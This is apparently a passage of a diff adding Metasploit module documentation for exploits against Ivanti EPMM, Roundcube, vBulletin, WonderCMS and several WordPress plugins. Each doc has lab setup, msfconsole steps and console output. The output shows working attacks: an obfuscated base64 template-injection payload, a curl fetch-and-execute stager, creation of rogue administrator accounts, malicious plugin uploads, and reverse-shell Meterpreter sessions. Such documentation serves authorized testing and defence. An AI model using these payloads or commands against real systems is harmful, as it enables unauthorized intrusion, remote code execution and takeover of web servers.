+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Attempting to execute payload
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('python3 -c exec(__import__("base64").b64decode("ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVVFMUx4REFRUFRlL0lyY2tHRU83dG50WXJDRGlRVVFFMTV1SXRNbW9vV2tTa3F4V3hmOXVReGJuTU1PYmVmUG1ROC9laFlTamt4TWsvbTMweU1jaHdyYmxNWVdEVER6cEdkQ3JDM2pCMnVJdzJEZWdUYzEycUVyaGEvVlY3RXV6S0lGdStCSHY3Njl1WC9hUEQ5ZVhkeXp6aEhUV2dreVVrcVlXbldqT09yR3BHOExiMVZpbWpBR0dDVld3U1BBcGErZmhJaG9BVHp1R1RGOTJFZ2ZyQnpsUmNuRkRlQlFCNUFkZEJaN3FaNlQ2SXpZTWZiNXJBOWlBcFlxZG0xVk9uZnhYVDB1YUlWaEEwbnkyVUNEZDdBUEVTTXNIeExodGMxSkJadklmRXNrdS9qTDBCOGd3WHZBPScpWzBdKSkp"))').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Sending stage (24768 bytes) to 10.5.132.244
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.244:50322) at 2025-06-03 13:38:16 -0500
+meterpreter > sysinfo
+Computer        : ivanti.example.local
+OS              : Linux 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: tomcat
+meterpreter > exit
+
+```
@@ -0,0 +1,147 @@
+## Vulnerable Application
+  This module exploits an authenticated remote code execution vulnerability via a file upload
+  endpoint. The vulnerability stems from improper validation of the uploaded filename, which is
+  deserialized on the server side without sufficient sanitization. By embedding a PHP serialization
+  gadget chain in the filename, an attacker can achieve remote code execution.
+
+  This issue is tracked as CVE-2025-49113. Exploitation results in code execution as the web server
+  user.
+
+## Testing
+To set up a test environment:
+1. Set up an Roundcube.
+
+Create File
+`docker-compose.xml`
+```
+version: '3'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: example_root_pass
+      MYSQL_DATABASE: roundcube
+      MYSQL_USER: roundcube_user
+      MYSQL_PASSWORD: roundcube_pass
+    volumes:
+      - db_data:/var/lib/mysql
+
+  roundcube:
+    image: roundcube/roundcubemail:1.5.9-apache
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+    environment:
+      ROUNDCUBEMAIL_DEFAULT_HOST: <ROUNDCUBEMAIL_DEFAULT_HOST>
+      ROUNDCUBEMAIL_SMTP_SERVER: <ROUNDCUBEMAIL_SMTP_SERVER>
+      ROUNDCUBEMAIL_SMTP_PORT: 587
+      ROUNDCUBEMAIL_SMTP_USER: <ROUNDCUBEMAIL_SMTP_USER>
+      ROUNDCUBEMAIL_SMTP_PASS: <ROUNDCUBEMAIL_SMTP_PASS>
+      ROUNDCUBEMAIL_DES_KEY: randomstring
+      ROUNDCUBEMAIL_DB_TYPE: mysql
+      ROUNDCUBEMAIL_DB_HOST: db
+      ROUNDCUBEMAIL_DB_USER: roundcube_user
+      ROUNDCUBEMAIL_DB_PASSWORD: roundcube_pass
+      ROUNDCUBEMAIL_DB_NAME: roundcube
+
+volumes:
+  db_data:
+```
+
+Execute
+
+`docker compose up`
+
+2. Configure basic networking and confirm that the web service on port 8080 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/roundcube_unauth_rce_cve_2025_49113`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set LHOST <LOCAL_IP>`
+6. `set LPORT <LOCAL_PORT>`
+7. `set USERNAME <USERNAME_TO_LOGIN_WITH>`
+8. `set PASSWORD <PASSWORD_TO_LOGIN_WITH>`
+9. `run`
+
+## Scenarios
+### Roundcube Linux Target
+```
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > show options
+
+Module options (exploit/multi/http/roundcube_unauth_rce_cve_2025_49113):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HOST                        no        The hostname of Roundcube server
+   PASSWORD                    yes       Password to login with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      9999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The URI of the Roundcube Application
+   TIMEOUT    3                no        Time to wait for session (in seconds)
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME                    yes       Email User to login with
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.129:8082 
+[*] Using URL: http://192.168.159.129:9696/
+[*] Fetching CSRF token...
+[*] Attempting login...
+[+] Login successful.
+[*] Preparing payload...
+[+] Payload successfully generated and serialized.
+[*] Uploading malicious payload...
+[*] Client 192.168.181.148 (curl/7.74.0) requested /
+[*] Sending payload to 192.168.181.148 (curl/7.74.0)
+[*] Sending stage (3045380 bytes) to 192.168.181.148
+[*] Meterpreter session 1 opened (192.168.159.129:8082 -> 192.168.181.148:56528) at 2025-06-06 21:05:59 -0400
+[+] Exploit attempt complete. Check for session.
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+
+meterpreter > sysinfo
+Computer     : dante.local
+OS           : Debian 11.5 (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+This Metasploit module exploits a design flaw in vBulletin’s AJAX API handler and template
+rendering system, affecting **vBulletin 5.0.0 through 6.0.3** on **PHP 8.1+**.
+An unauthenticated attacker can invoke the protected `vB_Api_Ad::replaceAdTemplate()` method to inject a malicious template that calls
+`"system"("base64_decode"($_POST[<param>]))`, then trigger execution via the `ajax/render/ad_<location>` endpoint,
+yielding arbitrary code execution as the webserver user.
+
+> **Note:** vBulletin is commercial software and is **not** included here. You must obtain a licensed copy and extract it under `./upload/`.
+
+---
+
+## To replicate vulnerable environments
+
+1. **vBulletin 6.0.1 (tested)**
+
+   * Purchase and download vBulletin 6.0.1 from the official portal.
+   * Extract all files into `./upload/`.
+
+2. **Other versions (5.0.0–6.0.3)**
+
+   * Repeat the above with any of the supported versions.
+   * Ensure you run on PHP 8.1+; earlier PHP versions do not expose this flaw.
+
+---
+
+## Docker Compose Configuration
+
+```yaml
+services:
+  db:
+    image: mysql:5.7
+    container_name: vbulletin_db
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root_password_here
+      MYSQL_DATABASE: vbulletin
+      MYSQL_USER: vbulletin
+      MYSQL_PASSWORD: vb_password_here
+    volumes:
+      - db_data:/var/lib/mysql
+
+  web:
+    build: .
+    container_name: vbulletin_web
+    depends_on: [db]
+    ports: ["8888:80"]
+    environment:
+      VB_DB_HOST: db
+      VB_DB_NAME: vbulletin
+      VB_DB_USER: vbulletin
+      VB_DB_PASS: vb_password_here
+
+volumes:
+  db_data:
+```
+
+Create the following **Dockerfile** and **docker-entrypoint.sh** in the same directory:
+
+**Dockerfile**
+
+```dockerfile
+FROM php:8.1-apache
+
+COPY upload/ /var/www/html/
+
+RUN apt-get update && \
+    apt-get install -y --no-install-recommends \
+       libzip-dev zlib1g-dev libonig-dev \
+       libpng-dev libjpeg-dev libfreetype6-dev && \
+    docker-php-ext-install \
+       zip mysqli pdo_mysql gd mbstring && \
+    a2enmod rewrite && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN echo "phar.readonly=Off" > /usr/local/etc/php/conf.d/vbulletin.ini
+
+COPY --chmod 755 docker-entrypoint.sh /usr/local/bin/
+ENTRYPOINT ["docker-entrypoint.sh"]
+CMD ["apache2-foreground"]
+```
+
+**docker-entrypoint.sh**
+
+```bash
+#!/bin/bash
+chown -R www-data:www-data /var/www/html
+exec "$@"
+```
+
+---
+
+## Verification Steps
+
+1. **Start the environment**
+```bash
+docker-compose up -d
+```
+
+2. **Install vBulletin**
+Open [http://localhost:8888](http://localhost:8888) and complete the installation:
+
+* **Database Host:** db
+* **DB Name:** vbulletin
+* **DB User:** vbulletin
+* **DB Password:** vb_password_here
+
+3. **Run `msfconsole`**
+
+```bash
+use exploit/multi/http/vbulletin_replace_ad_template_rce
+set RHOSTS 127.0.0.1
+set RPORT 8888
+set TARGETURI /
+check
+```
+
+---
+
+## Options
+
+No option
+
+---
+
+## Scenarios
+
+### Unauthenticated Pre-Auth RCE
+
+1. Ensure vBulletin 5.0.0–6.0.3 is installed and running on PHP 8.1+.
+2. In `msfconsole`, configure and run:
+
+```bash
+set RHOSTS localhost
+set RPORT 8888
+set TARGETURI /
+```
+
+---
+
+## Expected Results
+
+### With `cmd/linux/http/x64/meterpreter/reverse_tcp`
+
+```plaintext
+msf6 exploit(multi/http/vbulletin_replace_ad_template_rce) > run http://lab:8888
+[*] Command to run on remote host: curl -so ./BGZuzbsi http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./BGZuzbsi;./BGZuzbsi&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Starting vulnerability check on 127.0.0.1:8888/
+[*] Generating random marker and condition for mode check
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=QuFcp)
+[*] Injection response: HTTP 200
+[+] Marker found in injection response body
+[+] The target is vulnerable.
+[*] Generating random marker and condition for mode exploit
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=XSGFS)
+[*] Client 172.28.0.3 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.28.0.3 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 8 opened (192.168.1.36:4444 -> 172.28.0.3:53014) at 2025-05-29 16:27:00 +0200
+
+meterpreter > sysinfo
+Computer     : 172.28.0.3
+OS           : Debian 12.11 (Linux 6.14.8-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,63 @@
+## Vulnerable Application
+
+[WonderCMS](https://www.wondercms.com/) is a free and open-source Content Management System (CMS). The main advantage is that only one PHP file controls the whole management. Follow next steps to install application:
+
+### Source Installation
+1. Install Apache2 and PHP on server
+2. Download WonderCMS from [here](https://github.com/WonderCMS/wondercms/releases/download/3.4.2/wondercms-342.zip)
+3. Enable Apache2 Rewrite Engine: `sudo a2enmod rewrite`
+### Docker Installation
+1. Clone the following repo: `git clone https://github.com/mablanco/docker-wondercms.git`
+2. Inside the `Dockerfile` set the version to a vulnerable version: `ARG WONDERCMS_VERSION=3.4.0`
+3. Build the image: ` docker build -t 3.4.0 .`
+4. Run the container: `docker run -d -p 8980:80 --name wondercms 3.4.0`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use multi/http/wondercms_rce`
+4. Do: `set PASSWORD [password]`
+5. Do: `set RHOST [WonderCMS IP]
+6. Do: `set SRVHOST [attacker IP to host payload]`
+7. Do: `set LHOST [attacker IP]`
+8. Do: `set LPORT [attacker PORT]`
+9. Do: `run`
+10. You should get a shell.
+
+## Options
+
+### PASSWORD
+
+WonderCMS uses a global password that generated at the application's first run. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access.
+
+## Scenarios
+
+```
+msf6 exploit(multi/http/wondercms_rce) > set LHOST 192.168.168.152
+LHOST => 192.168.168.152
+msf6 exploit(multi/http/wondercms_rce) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/http/wondercms_rce) > exploit
+[*] Exploit running as background job 28.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/wondercms_rce) > 
+[*] Started reverse TCP handler on 192.168.168.152:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is probably WonderCMS..
+[+] The target is vulnerable. Version 3.4.2 is affected
+[*] Using URL: http://192.168.168.152:8082/81k4.zip
+[*] Received request, sending payload..
+[*] Server stopped.
+[*] Command shell session 5 opened (192.168.168.152:4444 -> 192.168.168.146:37068) at 2025-04-25 14:46:20 +0200
+
+msf6 exploit(multi/http/wondercms_rce) > sessions 5
+[*] Starting interaction with 5...
+
+whoami
+www-data
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
@@ -0,0 +1,241 @@
+## Vulnerable Application
+
+This Metasploit module exploits administrative user creation vulnerabilities in the
+WordPress SureTriggers/OttoKit plugin:
+
+* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
+REST endpoint with an empty `St-Authorization: Bearer` header.
+* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
+followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.
+
+### To replicate vulnerable environments
+
+1. **SureTriggers v1.0.78 (CVE-2025-3102)**
+
+   * Download & install plugin v1.0.78:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip`
+   * No additional setup is required; the bypass works immediately upon activation.
+
+2. **SureTriggers v1.0.82 (CVE-2025-27007)**
+
+   * Download & install plugin v1.0.82:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip`
+   * No secret key is needed; the exploit will reset it to the specified value.
+
+Both scenarios can be deployed via Docker Compose.
+
+## Docker Compose Configuration
+
+```yaml
+services:
+
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_ROOT_PASSWORD: dummy_password
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+Create a `custom.ini` file with:
+
+```ini
+upload_max_filesize = 64M
+post_max_size = 64M
+```
+
+## Verification Steps
+
+1. Start the environment:
+
+```bash
+docker-compose up -d
+```
+2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
+3. Confirm the targeted SureTriggers version is active under **Plugins**.
+4. In `msfconsole`:
+
+```bash
+use exploit/multi/http/wp_suretriggers_auth_bypass
+set RHOSTS 127.0.0.1
+set TARGETURI /
+set WP_USER eviladmin
+set WP_PASS Str0ngP@ss!
+set WP_EMAIL eviladmin@example.com
+```
+
+## Options
+
+* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default).
+* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty).
+* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default).
+* **ACTION**: Exploit to perform:
+
+  * `CVE-2025-3102`
+  * `CVE-2025-27007`
+
+## Scenarios
+
+### CVE-2025-3102: Empty Bearer Admin Creation
+
+1. Ensure SureTriggers v1.0.78 is active.
+2. In `msfconsole`, set:
+
+```bash
+set ACTION CVE-2025-3102
+```
+3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.
+
+### CVE-2025-27007: Reset Access Key & Admin Creation
+
+1. Ensure SureTriggers v1.0.82 is active.
+2. In `msfconsole`, set:
+
+```bash
+set ACTION CVE-2025-27007
+```
+3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use
+   `St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.
+
+
+### Expected Results (CVE-2025-3102)
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_hkc1z/ajax_kq8xu.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_kq8xu.php
+[+] Deleted wp_hkc1z.php
+[+] Deleted ../wp_hkc1z
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 172.27.0.3:43702) at 2025-05-21 19:35:49 +0200
+
+meterpreter > sysinfo
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
+target => 1
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_xtndd/ajax_bmjl3.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_bmjl3.php
+[+] Deleted wp_xtndd.php
+[+] Deleted ../wp_xtndd
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.27.0.3:35176) at 2025-05-21 19:36:44 +0200
+
+meterpreter > sysinfo
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Expected Results (CVE-2025-27007)
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007
+action => CVE-2025-27007
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_kbl7m/ajax_awg0f.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_awg0f.php
+[+] Deleted wp_kbl7m.php
+[+] Deleted ../wp_kbl7m
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.3:52622) at 2025-05-21 19:31:04 +0200
+
+meterpreter > sysinfo
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
+target => 1
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_uozfu/ajax_cqg9q.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_cqg9q.php
+[+] Deleted wp_uozfu.php
+[+] Deleted ../wp_uozfu
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 172.27.0.3:56038) at 2025-05-21 19:33:42 +0200
+
+meterpreter > sysinfo
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11.
+The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory.
+Then module will trigger the payload by sending request with payload directory as URI.
+The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+
+## Verification Steps
+
+
+1. Install the application
+1.1 Create `docker-compose.yml`
+```yaml
+services:
+
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: ms
+      WORDPRESS_DB_PASSWORD: supersecret
+      WORDPRESS_DB_NAME: proof_of_concept
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: proof_of_concept
+      MYSQL_USER: ms
+      MYSQL_PASSWORD: supersecret
+      MYSQL_ROOT_PASSWORD: supersecret
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+1.3 Install the plugin in Wordpress admin portal
+
+2. `msfconsole`
+3. `use multi/http/wp_tatsu_rce`
+4. `set RHOST [target IP]`
+5. `set RPORT [target PORT]`
+6. `set LHOST [attacker's IP]`
+7. `set LPORT [attacker's port]`
+
+## Options
+
+
+## Scenarios
+
+
+Vulnerable version is <= 3.3.11.
+
+```
+`msf6 exploit(multi/http/wp_tatsu_rce) > run
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Sending stage (40004 bytes) to 172.18.0.2
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer    : ff0d55ec29bf
+OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,183 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated privilege escalation in the
+WordPress User Registration & Membership plugin (Free ≤ 4.1.2, Pro ≤ 5.1.2) (CVE-2025-2563).
+When the Membership Addon is enabled, the plugin fails to prevent users from setting their
+own account role, allowing anyone to escalate to administrator.
+
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress using the provided Docker Compose configuration.
+2. Download and install the User Registration plugin v4.1.1 (Free):
+   [https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip](https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip)
+3. Activate the plugin and enable the **Membership** Addon under:
+   `/wp-admin/admin.php?page=user-registration-dashboard#features`.
+4. No further configuration is required; vulnerability is present when the addon is active.
+   - Permalinks must be enabled.
+
+## Docker Compose Configuration
+
+```yaml
+services:
+
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_ROOT_PASSWORD: dummy_password
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+Create a `custom.ini` file with:
+
+```ini
+upload_max_filesize = 64M
+post_max_size = 64M
+```
+
+## Verification Steps
+
+1. Start the environment:
+
+```bash
+docker-compose up -d
+```
+
+2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
+3. Confirm the User Registration v4.1.1 plugin is active under **Plugins**.
+4. Enable the **Membership** Addon at `/wp-admin/admin.php?page=user-registration-dashboard#features`.
+5. Launch `msfconsole`.
+6. Load the module:
+
+```bash
+use exploit/multi/http/wp_user_registration_membership_escalation
+```
+
+7. Set `RHOSTS` to the target IP, and configure credentials:
+
+```bash
+set WP_USER eviluser
+set WP_PASS Str0ngP@ss!
+set WP_EMAIL eviluser@example.com
+```
+
+8. (Optional) Set `TARGETURI` if WordPress is installed in a subdirectory.
+9. Run the exploit:
+
+```bash
+run
+```
+
+## Options
+
+* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account to be created.
+
+## Scenarios
+
+### Successful Exploitation
+
+**Setup:**
+
+* Local WordPress instance with User Registration v4.1.1 (Free) and Membership Addon enabled.
+* Metasploit Framework
+
+**Steps:**
+
+1. Start `msfconsole`.
+2. Load the module:
+```bash
+use exploit/multi/http/wp_user_registration_membership_escalation
+```
+3. Configure options:
+```bash
+set RHOSTS 127.0.0.1
+set TARGETURI /
+set WP_USER admin2
+set WP_PASS P@ssw0rd!
+set WP_EMAIL admin2@example.com
+run
+```
+
+**Expected Results (PHP payload):**
+
+```plaintext
+msf6 exploit(multi/http/wp_user_registration_membership_escalation) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] Detected user-registration version 4.1.1
+[+] The target appears to be vulnerable.
+[*] Registering new user with free membership...
+[+] User registered: eviluser
+[*] Escalating to administrator...
+[+] Administrator created: eviluser:Str0ngP@ss!
+[*] Authenticating via wp-login.php…
+[!] wp-login.php failed—trying plugin login page
+[+] Authenticated via plugin login page
+[*] Uploading malicious plugin...
+[*] Executing payload at /wp-content/plugins/wp_rxrpu/ajax_1vxd2.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_1vxd2.php
+[+] Deleted wp_rxrpu.php
+[+] Deleted ../wp_rxrpu
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:41616) at 2025-05-09 16:55:20 +0200
+
+meterpreter > sysinfo
+Computer    : 111d64934b4f
+OS          : Linux 111d64934b4f 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+**Expected Results (Command payload):**
+
+```plaintext
+msf6 exploit(multi/http/wp_user_registration_membership_escalation) > run http://lab:5555
